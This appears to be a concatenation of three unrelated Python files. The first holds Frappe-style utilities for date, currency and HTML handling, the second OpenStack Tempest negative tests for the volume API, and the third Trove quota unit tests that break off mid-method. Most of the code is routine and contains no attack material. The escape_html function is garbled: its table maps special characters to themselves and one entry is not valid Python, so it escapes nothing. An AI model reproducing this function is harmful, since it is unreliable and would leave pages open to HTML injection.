def time_diff_in_hours(string_ed_date, string_st_date):
return round(float(time_diff(string_ed_date, string_st_date).total_seconds()) / 3600, 6)
def now_datetime():
dt = convert_utc_to_user_timezone(datetime.datetime.utcnow())
return dt.replace(tzinfo=None)
def _get_time_zone():
return frappe.db.get_system_setting('time_zone') or 'Asia/Kolkata'
def get_time_zone():
if frappe.local.flags.in_test:
return _get_time_zone()
return frappe.cache().get_value("time_zone", _get_time_zone)
def convert_utc_to_user_timezone(utc_timestamp):
from pytz import timezone, UnknownTimeZoneError
utcnow = timezone('UTC').localize(utc_timestamp)
try:
return utcnow.astimezone(timezone(get_time_zone()))
except UnknownTimeZoneError:
return utcnow
def now():
"""return current datetime as yyyy-mm-dd hh:mm:ss"""
if getattr(frappe.local, "current_date", None):
return getdate(frappe.local.current_date).strftime(DATE_FORMAT) + " " + \
now_datetime().strftime(TIME_FORMAT)
else:
return now_datetime().strftime(DATETIME_FORMAT)
def nowdate():
"""return current date as yyyy-mm-dd"""
return now_datetime().strftime(DATE_FORMAT)
def today():
return nowdate()
def nowtime():
"""return current time in hh:mm"""
return now_datetime().strftime(TIME_FORMAT)
def get_first_day(dt, d_years=0, d_months=0):
"""
Returns the first day of the month for the date specified by date object
Also adds `d_years` and `d_months` if specified
"""
dt = getdate(dt)
# d_years, d_months are "deltas" to apply to dt
overflow_years, month = divmod(dt.month + d_months - 1, 12)
year = dt.year + d_years + overflow_years
return datetime.date(year, month + 1, 1)
def get_last_day(dt):
"""
Returns last day of the month using:
`get_first_day(dt, 0, 1) + datetime.timedelta(-1)`
"""
return get_first_day(dt, 0, 1) + datetime.timedelta(-1)
def get_time(time_str):
if isinstance(time_str, datetime.datetime):
return time_str.time()
elif isinstance(time_str, datetime.time):
return time_str
return parser.parse(time_str).time()
def get_datetime_str(datetime_obj):
if isinstance(datetime_obj, basestring):
datetime_obj = get_datetime(datetime_obj)
return datetime_obj.strftime(DATETIME_FORMAT)
def get_user_format():
if getattr(frappe.local, "user_format", None) is None:
frappe.local.user_format = frappe.db.get_default("date_format")
return frappe.local.user_format or "yyyy-mm-dd"
def formatdate(string_date=None, format_string=None):
"""
Convers the given string date to :data:`user_format`
User format specified in defaults
Examples:
* dd-mm-yyyy
* mm-dd-yyyy
* dd/mm/yyyy
"""
date = getdate(string_date) if string_date else now_datetime().date()
if not format_string:
format_string = get_user_format().replace("mm", "MM")
return babel.dates.format_date(date, format_string, locale=(frappe.local.lang or "").replace("-", "_"))
def format_time(txt):
return babel.dates.format_time(get_time(txt), locale=(frappe.local.lang or "").replace("-", "_"))
def format_datetime(datetime_string, format_string=None):
if not datetime_string:
return
datetime = get_datetime(datetime_string)
if not format_string:
format_string = get_user_format().replace("mm", "MM") + " HH:mm:ss"
return babel.dates.format_datetime(datetime, format_string, locale=(frappe.local.lang or "").replace("-", "_"))
def global_date_format(date):
"""returns date as 1 January 2012"""
formatted_date = getdate(date).strftime("%d %B %Y")
return formatted_date.startswith("0") and formatted_date[1:] or formatted_date
def has_common(l1, l2):
"""Returns truthy value if there are common elements in lists l1 and l2"""
return set(l1) & set(l2)
def flt(s, precision=None):
"""Convert to float (ignore commas)"""
if isinstance(s, basestring):
s = s.replace(',','')
try:
num = float(s)
if precision is not None:
num = rounded(num, precision)
except Exception:
num = 0
return num
def cint(s):
"""Convert to integer"""
try: num = int(float(s))
except: num = 0
return num
def cstr(s):
if isinstance(s, unicode):
return s
elif s==None:
return ''
elif isinstance(s, basestring):
return unicode(s, 'utf-8')
else:
return unicode(s)
def rounded(num, precision=0):
"""round method for round halfs to nearest even algorithm aka banker's rounding - compatible with python3"""
precision = cint(precision)
multiplier = 10 ** precision
# avoid rounding errors
num = round(num * multiplier if precision else num, 8)
floor = math.floor(num)
decimal_part = num - floor
if not precision and decimal_part == 0.5:
num = floor if (floor % 2 == 0) else floor + 1
else:
num = round(num)
return (num / multiplier) if precision else num
def remainder(numerator, denominator, precision=2):
precision = cint(precision)
multiplier = 10 ** precision
if precision:
_remainder = ((numerator * multiplier) % (denominator * multiplier)) / multiplier
else:
_remainder = numerator % denominator
return flt(_remainder, precision);
def round_based_on_smallest_currency_fraction(value, currency, precision=2):
smallest_currency_fraction_value = flt(frappe.db.get_value("Currency",
currency, "smallest_currency_fraction_value"))
if smallest_currency_fraction_value:
remainder_val = remainder(value, smallest_currency_fraction_value, precision)
if remainder_val > (smallest_currency_fraction_value / 2):
value += smallest_currency_fraction_value - remainder_val
else:
value -= remainder_val
else:
value = rounded(value)
return flt(value, precision)
def encode(obj, encoding="utf-8"):
if isinstance(obj, list):
out = []
for o in obj:
if isinstance(o, unicode):
out.append(o.encode(encoding))
else:
out.append(o)
return out
elif isinstance(obj, unicode):
return obj.encode(encoding)
else:
return obj
def parse_val(v):
"""Converts to simple datatypes from SQL query results"""
if isinstance(v, (datetime.date, datetime.datetime)):
v = unicode(v)
elif isinstance(v, datetime.timedelta):
v = ":".join(unicode(v).split(":")[:2])
elif isinstance(v, long):
v = int(v)
return v
def fmt_money(amount, precision=None, currency=None):
"""
Convert to string with commas for thousands, millions etc
"""
number_format = None
if currency:
number_format = frappe.db.get_value("Currency", currency, "number_format", cache=True)
if not number_format:
number_format = frappe.db.get_default("number_format") or "#,###.##"
decimal_str, comma_str, number_format_precision = get_number_format_info(number_format)
if precision is None:
precision = number_format_precision
amount = '%.*f' % (precision, flt(amount))
if amount.find('.') == -1:
decimals = ''
else:
decimals = amount.split('.')[1]
parts = []
minus = ''
if flt(amount) < 0:
minus = '-'
amount = cstr(abs(flt(amount))).split('.')[0]
if len(amount) > 3:
parts.append(amount[-3:])
amount = amount[:-3]
val = number_format=="#,##,###.##" and 2 or 3
while len(amount) > val:
parts.append(amount[-val:])
amount = amount[:-val]
parts.append(amount)
parts.reverse()
amount = comma_str.join(parts) + ((precision and decimal_str) and (decimal_str + decimals) or "")
amount = minus + amount
if currency and frappe.defaults.get_global_default("hide_currency_symbol") != "Yes":
symbol = frappe.db.get_value("Currency", currency, "symbol") or currency
amount = symbol + " " + amount
return amount
number_format_info = {
"#,###.##": (".", ",", 2),
"#.###,##": (",", ".", 2),
"# ###.##": (".", " ", 2),
"# ###,##": (",", " ", 2),
"#'###.##": (".", "'", 2),
"#, ###.##": (".", ", ", 2),
"#,##,###.##": (".", ",", 2),
"#,###.###": (".", ",", 3),
"#.###": ("", ".", 0),
"#,###": ("", ",", 0)
}
def get_number_format_info(format):
return number_format_info.get(format) or (".", ",", 2)
#
# convet currency to words
#
def money_in_words(number, main_currency = None, fraction_currency=None):
"""
Returns string in words with currency and fraction currency.
"""
from frappe.utils import get_defaults
_ = frappe._
if not number or flt(number) < 0:
return ""
d = get_defaults()
if not main_currency:
main_currency = d.get('currency', 'INR')
if not fraction_currency:
fraction_currency = frappe.db.get_value("Currency", main_currency, "fraction") or _("Cent")
n = "%.2f" % flt(number)
main, fraction = n.split('.')
if len(fraction)==1: fraction += '0'
number_format = frappe.db.get_value("Currency", main_currency, "number_format", cache=True) or \
frappe.db.get_default("number_format") or "#,###.##"
in_million = True
if number_format == "#,##,###.##": in_million = False
out = main_currency + ' ' + in_words(main, in_million).title()
if cint(fraction):
out = out + ' ' + _('and') + ' ' + in_words(fraction, in_million).title() + ' ' + fraction_currency
return out + ' ' + _('only.')
#
# convert number to words
#
def in_words(integer, in_million=True):
"""
Returns string in words for the given integer.
"""
locale = 'en_IN' if not in_million else frappe.local.lang
integer = int(integer)
try:
ret = num2words(integer, lang=locale)
except NotImplementedError:
ret = num2words(integer, lang='en')
return ret.replace('-', ' ')
def is_html(text):
out = False
for key in ["<br>", "<p", "<img", "<div"]:
if key in text:
out = True
break
return out
# from Jinja2 code
_striptags_re = re.compile(r'(<!--.*?-->|<[^>]*>)')
def strip_html(text):
"""removes anything enclosed in and including <>"""
return _striptags_re.sub("", text)
def escape_html(text):
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
return "".join(html_escape_table.get(c,c) for c in text)
def pretty_date(iso_datetime):
"""
Takes an ISO time and returns a string representing how
long ago the date represents.
Ported from PrettyDate by John Resig
"""
if not iso_datetime: return ''
import math
if isinstance(iso_datetime, basestring):
iso_datetime = datetime.datetime.strptime(iso_datetime, DATETIME_FORMAT)
now_dt = datetime.datetime.strptime(now(), DATETIME_FORMAT)
dt_diff = now_dt - iso_datetime
# available only in python 2.7+
# dt_diff_seconds = dt_diff.total_seconds()
dt_diff_seconds = dt_diff.days * 86400.0 + dt_diff.seconds
dt_diff_days = math.floor(dt_diff_seconds / 86400.0)
# differnt cases
if dt_diff_seconds < 60.0:
return 'just now'
elif dt_diff_seconds < 120.0:
return '1 minute ago'
elif dt_diff_seconds < 3600.0:
return '%s minutes ago' % cint(math.floor(dt_diff_seconds / 60.0))
elif dt_diff_seconds < 7200.0:
return '1 hour ago'
elif dt_diff_seconds < 86400.0:
return '%s hours ago' % cint(math.floor(dt_diff_seconds / 3600.0))
elif dt_diff_days == 1.0:
return 'Yesterday'
elif dt_diff_days < 7.0:
return '%s days ago' % cint(dt_diff_days)
elif dt_diff_days < 31.0:
return '%s week(s) ago' % cint(math.ceil(dt_diff_days / 7.0))
elif dt_diff_days < 365.0:
return '%s months ago' % cint(math.ceil(dt_diff_days / 30.0))
else:
return 'more than %s year(s) ago' % cint(math.floor(dt_diff_days / 365.0))
def comma_or(some_list):
return comma_sep(some_list, frappe._("{0} or {1}"))
def comma_and(some_list):
return comma_sep(some_list, frappe._("{0} and {1}"))
def comma_sep(some_list, pattern):
if isinstance(some_list, (list, tuple)):
# list(some_list) is done to preserve the existing list
some_list = [unicode(s) for s in list(some_list)]
if not some_list:
return ""
elif len(some_list) == 1:
return some_list[0]
else:
some_list = ["'%s'" % s for s in some_list]
return pattern.format(", ".join(frappe._(s) for s in some_list[:-1]), some_list[-1])
else:
return some_list
def new_line_sep(some_list):
if isinstance(some_list, (list, tuple)):
# list(some_list) is done to preserve the existing list
some_list = [unicode(s) for s in list(some_list)]
if not some_list:
return ""
elif len(some_list) == 1:
return some_list[0]
else:
some_list = ["%s" % s for s in some_list]
return format("\n ".join(some_list))
else:
return some_list
def filter_strip_join(some_list, sep):
"""given a list, filter None values, strip spaces and join"""
return (cstr(sep)).join((cstr(a).strip() for a in filter(None, some_list)))
def get_url(uri=None, full_address=False):
"""get app url from request"""
host_name = frappe.local.conf.host_name
if uri and (uri.startswith("http://") or uri.startswith("https://")):
return uri
if not host_name:
if hasattr(frappe.local, "request") and frappe.local.request and frappe.local.request.host:
protocol = 'https' == frappe.get_request_header('X-Forwarded-Proto', "") and 'https://' or 'http://'
host_name = protocol + frappe.local.request.host
elif frappe.local.site:
host_name = "http://{}".format(frappe.local.site)
else:
host_name = frappe.db.get_value("Website Settings", "Website Settings",
"subdomain")
if host_name and "http" not in host_name:
host_name = "http://" + host_name
if not host_name:
host_name = "http://localhost"
if not uri and full_address:
uri = frappe.get_request_header("REQUEST_URI", "")
url = urllib.basejoin(host_name, uri) if uri else host_name
return url
def get_host_name():
return get_url().rsplit("//", 1)[-1]
def get_link_to_form(doctype, name, label=None):
if not label: label = name
return """<a href="{0}">{1}</a>""".format(get_url_to_form(doctype, name), label)
def get_url_to_form(doctype, name):
return get_url(uri = "desk#Form/{0}/{1}".format(quoted(doctype), quoted(name)))
def get_url_to_list(doctype):
return get_url(uri = "desk#List/{0}".format(quoted(doctype)))
operator_map = {
# startswith
"^": lambda (a, b): (a or "").startswith(b),
# in or not in a list
"in": lambda (a, b): operator.contains(b, a),
"not in": lambda (a, b): not operator.contains(b, a),
# comparison operators
"=": lambda (a, b): operator.eq(a, b),
"!=": lambda (a, b): operator.ne(a, b),
">": lambda (a, b): operator.gt(a, b),
"<": lambda (a, b): operator.lt(a, b),
">=": lambda (a, b): operator.ge(a, b),
"<=": lambda (a, b): operator.le(a, b),
"not None": lambda (a, b): a and True or False,
"None": lambda (a, b): (not a) and True or False
}
def compare(val1, condition, val2):
ret = False
if condition in operator_map:
ret = operator_map[condition]((val1, val2))
return ret
def scrub_urls(html):
html = expand_relative_urls(html)
# encoding should be responsibility of the composer
# html = quote_urls(html)
return html
def expand_relative_urls(html):
# expand relative urls
url = get_url()
if url.endswith("/"): url = url[:-1]
def _expand_relative_urls(match):
to_expand = list(match.groups())
if not to_expand[2].startswith("/"):
to_expand[2] = "/" + to_expand[2]
to_expand.insert(2, url)
return "".join(to_expand)
return re.sub('(href|src){1}([\s]*=[\s]*[\'"]?)((?!http)[^\'" >]+)([\'"]?)', _expand_relative_urls, html)
def quoted(url):
return cstr(urllib.quote(encode(url), safe=b"~@#$&()*!+=:;,.?/'"))
def quote_urls(html):
def _quote_url(match):
groups = list(match.groups())
groups[2] = quoted(groups[2])
return "".join(groups)
return re.sub('(href|src){1}([\s]*=[\s]*[\'"]?)((?:http)[^\'">]+)([\'"]?)',
_quote_url, html)
def unique(seq):
"""use this instead of list(set()) to preserve order of the original list.
Thanks to Stackoverflow: http://stackoverflow.com/questions/480214/how-do-you-remove-duplicates-from-a-list-in-python-whilst-preserving-order"""
seen = set()
seen_add = seen.add
return [ x for x in seq if not (x in seen or seen_add(x)) ]
def strip(val, chars=None):
# \ufeff is no-width-break, \u200b is no-width-space
return (val or "").replace("\ufeff", "").replace("\u200b", "").strip(chars)
def to_markdown(html):
text = None
try:
text = html2text(html)
except HTMLParser.HTMLParseError:
pass
return text
|
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from tempest.api.volume import base
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesNegativeTest(base.BaseVolumeTest):
@classmethod
def resource_setup(cls):
super(VolumesNegativeTest, cls).resource_setup()
# Create a test shared instance and volume for attach/detach tests
cls.volume = cls.create_volume()
cls.mountpoint = "/dev/vdc"
def create_image(self):
# Create image
image_name = data_utils.rand_name(self.__class__.__name__ + "-image")
image = self.images_client.create_image(
name=image_name,
container_format=CONF.image.container_formats[0],
disk_format=CONF.image.disk_formats[0],
visibility='private',
min_disk=CONF.volume.volume_size + 1)
self.addCleanup(test_utils.call_and_ignore_notfound_exc,
self.images_client.delete_image, image['id'])
# Upload image with 1KB data
image_file = six.BytesIO(data_utils.random_bytes())
self.images_client.store_image_file(image['id'], image_file)
waiters.wait_for_image_status(self.images_client,
image['id'], 'active')
return image
@decorators.attr(type=['negative'])
@decorators.idempotent_id('f131c586-9448-44a4-a8b0-54ca838aa43e')
def test_volume_get_nonexistent_volume_id(self):
# Should not be able to get a non-existent volume
self.assertRaises(lib_exc.NotFound, self.volumes_client.show_volume,
data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('555efa6e-efcd-44ef-8a3b-4a7ca4837a29')
def test_volume_delete_nonexistent_volume_id(self):
# Should not be able to delete a non-existent Volume
self.assertRaises(lib_exc.NotFound, self.volumes_client.delete_volume,
data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('1ed83a8a-682d-4dfb-a30e-ee63ffd6c049')
def test_create_volume_with_invalid_size(self):
# Should not be able to create volume with invalid size in request
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume, size='#$%')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('9387686f-334f-4d31-a439-33494b9e2683')
def test_create_volume_without_passing_size(self):
# Should not be able to create volume without passing size
# in request
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume, size='')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('41331caa-eaf4-4001-869d-bc18c1869360')
def test_create_volume_with_size_zero(self):
# Should not be able to create volume with size zero
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume, size='0')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('8b472729-9eba-446e-a83b-916bdb34bef7')
def test_create_volume_with_size_negative(self):
# Should not be able to create volume with size negative
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume, size='-1')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('10254ed8-3849-454e-862e-3ab8e6aa01d2')
def test_create_volume_with_nonexistent_volume_type(self):
# Should not be able to create volume with non-existent volume type
self.assertRaises(lib_exc.NotFound, self.volumes_client.create_volume,
size='1', volume_type=data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('0c36f6ae-4604-4017-b0a9-34fdc63096f9')
def test_create_volume_with_nonexistent_snapshot_id(self):
# Should not be able to create volume with non-existent snapshot
self.assertRaises(lib_exc.NotFound, self.volumes_client.create_volume,
size='1', snapshot_id=data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('47c73e08-4be8-45bb-bfdf-0c4e79b88344')
def test_create_volume_with_nonexistent_source_volid(self):
# Should not be able to create volume with non-existent source volume
self.assertRaises(lib_exc.NotFound, self.volumes_client.create_volume,
size='1', source_volid=data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('0186422c-999a-480e-a026-6a665744c30c')
def test_update_volume_with_nonexistent_volume_id(self):
self.assertRaises(lib_exc.NotFound, self.volumes_client.update_volume,
volume_id=data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('e66e40d6-65e6-4e75-bdc7-636792fa152d')
def test_update_volume_with_invalid_volume_id(self):
self.assertRaises(lib_exc.NotFound, self.volumes_client.update_volume,
volume_id=data_utils.rand_name('invalid'))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('72aeca85-57a5-4c1f-9057-f320f9ea575b')
def test_update_volume_with_empty_volume_id(self):
self.assertRaises(lib_exc.NotFound, self.volumes_client.update_volume,
volume_id='')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('30799cfd-7ee4-446c-b66c-45b383ed211b')
def test_get_invalid_volume_id(self):
# Should not be able to get volume with invalid id
self.assertRaises(lib_exc.NotFound, self.volumes_client.show_volume,
data_utils.rand_name('invalid'))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('c6c3db06-29ad-4e91-beb0-2ab195fe49e3')
def test_get_volume_without_passing_volume_id(self):
# Should not be able to get volume when empty ID is passed
self.assertRaises(lib_exc.NotFound,
self.volumes_client.show_volume, '')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('1f035827-7c32-4019-9240-b4ec2dbd9dfd')
def test_delete_invalid_volume_id(self):
# Should not be able to delete volume when invalid ID is passed
self.assertRaises(lib_exc.NotFound, self.volumes_client.delete_volume,
data_utils.rand_name('invalid'))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('441a1550-5d44-4b30-af0f-a6d402f52026')
def test_delete_volume_without_passing_volume_id(self):
# Should not be able to delete volume when empty ID is passed
self.assertRaises(lib_exc.NotFound,
self.volumes_client.delete_volume, '')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('f5e56b0a-5d02-43c1-a2a7-c9b792c2e3f6')
@test.services('compute')
def test_attach_volumes_with_nonexistent_volume_id(self):
server = self.create_server()
self.assertRaises(lib_exc.NotFound,
self.volumes_client.attach_volume,
data_utils.rand_uuid(),
instance_uuid=server['id'],
mountpoint=self.mountpoint)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('9f9c24e4-011d-46b5-b992-952140ce237a')
def test_detach_volumes_with_invalid_volume_id(self):
self.assertRaises(lib_exc.NotFound,
self.volumes_client.detach_volume,
'xxx')
@decorators.attr(type=['negative'])
@decorators.idempotent_id('e0c75c74-ee34-41a9-9288-2a2051452854')
def test_volume_extend_with_size_smaller_than_original_size(self):
# Extend volume with smaller size than original size.
extend_size = 0
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.extend_volume,
self.volume['id'], new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('5d0b480d-e833-439f-8a5a-96ad2ed6f22f')
def test_volume_extend_with_non_number_size(self):
# Extend volume when size is non number.
extend_size = 'abc'
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.extend_volume,
self.volume['id'], new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('355218f1-8991-400a-a6bb-971239287d92')
def test_volume_extend_with_None_size(self):
# Extend volume with None size.
extend_size = None
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.extend_volume,
self.volume['id'], new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('8f05a943-013c-4063-ac71-7baf561e82eb')
def test_volume_extend_with_nonexistent_volume_id(self):
# Extend volume size when volume is nonexistent.
extend_size = self.volume['size'] + 1
self.assertRaises(lib_exc.NotFound, self.volumes_client.extend_volume,
data_utils.rand_uuid(), new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('aff8ba64-6d6f-4f2e-bc33-41a08ee9f115')
def test_volume_extend_without_passing_volume_id(self):
# Extend volume size when passing volume id is None.
extend_size = self.volume['size'] + 1
self.assertRaises(lib_exc.NotFound, self.volumes_client.extend_volume,
None, new_size=extend_size)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('ac6084c0-0546-45f9-b284-38a367e0e0e2')
def test_reserve_volume_with_nonexistent_volume_id(self):
self.assertRaises(lib_exc.NotFound,
self.volumes_client.reserve_volume,
data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('eb467654-3dc1-4a72-9b46-47c29d22654c')
def test_unreserve_volume_with_nonexistent_volume_id(self):
self.assertRaises(lib_exc.NotFound,
self.volumes_client.unreserve_volume,
data_utils.rand_uuid())
@decorators.attr(type=['negative'])
@decorators.idempotent_id('449c4ed2-ecdd-47bb-98dc-072aeccf158c')
def test_reserve_volume_with_negative_volume_status(self):
# Mark volume as reserved.
self.volumes_client.reserve_volume(self.volume['id'])
# Mark volume which is marked as reserved before
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.reserve_volume,
self.volume['id'])
# Unmark volume as reserved.
self.volumes_client.unreserve_volume(self.volume['id'])
@decorators.attr(type=['negative'])
@decorators.idempotent_id('0f4aa809-8c7b-418f-8fb3-84c7a5dfc52f')
def test_list_volumes_with_nonexistent_name(self):
v_name = data_utils.rand_name(self.__class__.__name__ + '-Volume')
params = {'name': v_name}
fetched_volume = self.volumes_client.list_volumes(
params=params)['volumes']
self.assertEmpty(fetched_volume)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('9ca17820-a0e7-4cbd-a7fa-f4468735e359')
def test_list_volumes_detail_with_nonexistent_name(self):
v_name = data_utils.rand_name(self.__class__.__name__ + '-Volume')
params = {'name': v_name}
fetched_volume = \
self.volumes_client.list_volumes(
detail=True, params=params)['volumes']
self.assertEmpty(fetched_volume)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('143b279b-7522-466b-81be-34a87d564a7c')
def test_list_volumes_with_invalid_status(self):
params = {'status': 'null'}
fetched_volume = self.volumes_client.list_volumes(
params=params)['volumes']
self.assertEmpty(fetched_volume)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('ba94b27b-be3f-496c-a00e-0283b373fa75')
def test_list_volumes_detail_with_invalid_status(self):
params = {'status': 'null'}
fetched_volume = \
self.volumes_client.list_volumes(detail=True,
params=params)['volumes']
self.assertEmpty(fetched_volume)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('5b810c91-0ad1-47ce-aee8-615f789be78f')
@test.services('image')
def test_create_volume_from_image_with_decreasing_size(self):
# Create image
image = self.create_image()
# Note(jeremyZ): To shorten the test time (uploading a big size image
# is time-consuming), here just consider the scenario that volume size
# is smaller than the min_disk of image.
self.assertRaises(lib_exc.BadRequest,
self.volumes_client.create_volume,
size=CONF.volume.volume_size,
imageRef=image['id'])
@decorators.attr(type=['negative'])
@decorators.idempotent_id('d15e7f35-2cfc-48c8-9418-c8223a89bcbb')
@test.services('image')
def test_create_volume_from_deactivated_image(self):
# Create image
image = self.create_image()
# Deactivate the image
self.images_client.deactivate_image(image['id'])
body = self.images_client.show_image(image['id'])
self.assertEqual("deactivated", body['status'])
# Try creating a volume from deactivated image
self.assertRaises(lib_exc.BadRequest,
self.create_volume,
imageRef=image['id'])
|
|
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mock import Mock, MagicMock, patch
from testtools import skipIf
from trove.common import cfg
from trove.common import exception
from trove.db.models import DatabaseModelBase
from trove.extensions.mgmt.quota.service import QuotaController
from trove.quota.models import Quota
from trove.quota.models import QuotaUsage
from trove.quota.models import Reservation
from trove.quota.models import Resource
from trove.quota.quota import DbQuotaDriver
from trove.quota.quota import QUOTAS
from trove.quota.quota import run_with_quotas
from trove.tests.unittests import trove_testtools
"""
Unit tests for the classes and functions in DbQuotaDriver.py.
"""
CONF = cfg.CONF
resources = {
Resource.INSTANCES: Resource(Resource.INSTANCES,
'max_instances_per_tenant'),
Resource.VOLUMES: Resource(Resource.VOLUMES, 'max_volumes_per_tenant')
}
FAKE_TENANT1 = "123456"
FAKE_TENANT2 = "654321"
class Run_with_quotasTest(trove_testtools.TestCase):
def setUp(self):
super(Run_with_quotasTest, self).setUp()
self.quota_reserve_orig = QUOTAS.reserve
self.quota_rollback_orig = QUOTAS.rollback
self.quota_commit_orig = QUOTAS.commit
QUOTAS.reserve = Mock()
QUOTAS.rollback = Mock()
QUOTAS.commit = Mock()
def tearDown(self):
super(Run_with_quotasTest, self).tearDown()
QUOTAS.reserve = self.quota_reserve_orig
QUOTAS.rollback = self.quota_rollback_orig
QUOTAS.commit = self.quota_commit_orig
def test_run_with_quotas(self):
f = Mock()
run_with_quotas(FAKE_TENANT1, {'instances': 1, 'volumes': 5}, f)
self.assertTrue(QUOTAS.reserve.called)
self.assertTrue(QUOTAS.commit.called)
self.assertFalse(QUOTAS.rollback.called)
self.assertTrue(f.called)
def test_run_with_quotas_error(self):
f = Mock(side_effect=exception.TroveError())
self.assertRaises(exception.TroveError, run_with_quotas, FAKE_TENANT1,
{'instances': 1, 'volumes': 5}, f)
self.assertTrue(QUOTAS.reserve.called)
self.assertTrue(QUOTAS.rollback.called)
self.assertFalse(QUOTAS.commit.called)
self.assertTrue(f.called)
class QuotaControllerTest(trove_testtools.TestCase):
def setUp(self):
super(QuotaControllerTest, self).setUp()
context = MagicMock()
context.is_admin = True
req = MagicMock()
req.environ = MagicMock()
req.environ.get = MagicMock(return_value=context)
self.req = req
self.controller = QuotaController()
def tearDown(self):
super(QuotaControllerTest, self).tearDown()
def test_update_unknown_resource(self):
body = {'quotas': {'unknown_resource': 5}}
self.assertRaises(exception.QuotaResourceUnknown,
self.controller.update, self.req, body,
FAKE_TENANT1, FAKE_TENANT2)
def test_update_resource_no_value(self):
quota = MagicMock(spec=Quota)
with patch.object(DatabaseModelBase, 'find_by', return_value=quota):
body = {'quotas': {'instances': None}}
result = self.controller.update(self.req, body, FAKE_TENANT1,
FAKE_TENANT2)
self.assertEqual(0, quota.save.call_count)
self.assertEqual(200, result.status)
def test_update_resource_instance(self):
instance_quota = MagicMock(spec=Quota)
with patch.object(DatabaseModelBase, 'find_by',
return_value=instance_quota):
body = {'quotas': {'instances': 2}}
result = self.controller.update(self.req, body, FAKE_TENANT1,
FAKE_TENANT2)
self.assertEqual(1, instance_quota.save.call_count)
self.assertIn('instances', result._data['quotas'])
self.assertEqual(200, result.status)
self.assertEqual(2, result._data['quotas']['instances'])
@skipIf(not CONF.trove_volume_support, 'Volume support is not enabled')
def test_update_resource_volume(self):
instance_quota = MagicMock(spec=Quota)
volume_quota = MagicMock(spec=Quota)
def side_effect_func(*args, **kwargs):
return (instance_quota if kwargs['resource'] == 'instances'
else volume_quota)
with patch.object(DatabaseModelBase, 'find_by',
side_effect=side_effect_func):
body = {'quotas': {'instances': None, 'volumes': 10}}
result = self.controller.update(self.req, body, FAKE_TENANT1,
FAKE_TENANT2)
self.assertEqual(0, instance_quota.save.call_count)
self.assertNotIn('instances', result._data['quotas'])
self.assertEqual(1, volume_quota.save.call_count)
self.assertEqual(200, result.status)
self.assertEqual(10, result._data['quotas']['volumes'])
def test_update_resource_with_invalid_negative_number(self):
quota = MagicMock(spec=Quota)
with patch.object(DatabaseModelBase, 'find_by', return_value=quota):
body = {'quotas': {'instances': -2}}
self.assertRaises(exception.QuotaLimitTooSmall,
self.controller.update,
self.req, body, FAKE_TENANT1,
FAKE_TENANT2)
class DbQuotaDriverTest(trove_testtools.TestCase):
def setUp(self):
super(DbQuotaDriverTest, self).setUp()
self.driver = DbQuotaDriver(resources)
self.orig_Quota_find_all = Quota.find_all
self.orig_QuotaUsage_find_all = QuotaUsage.find_all
self.orig_QuotaUsage_find_by = QuotaUsage.find_by
self.orig_Reservation_create = Reservation.create
self.orig_QuotaUsage_create = QuotaUsage.create
self.orig_QuotaUsage_save = QuotaUsage.save
self.orig_Reservation_save = Reservation.save
self.mock_quota_result = Mock()
self.mock_usage_result = Mock()
Quota.find_all = Mock(return_value=self.mock_quota_result)
QuotaUsage.find_all = Mock(return_value=self.mock_usage_result)
def tearDown(self):
super(DbQuotaDriverTest, self).tearDown()
Quota.find_all = self.orig_Quota_find_all
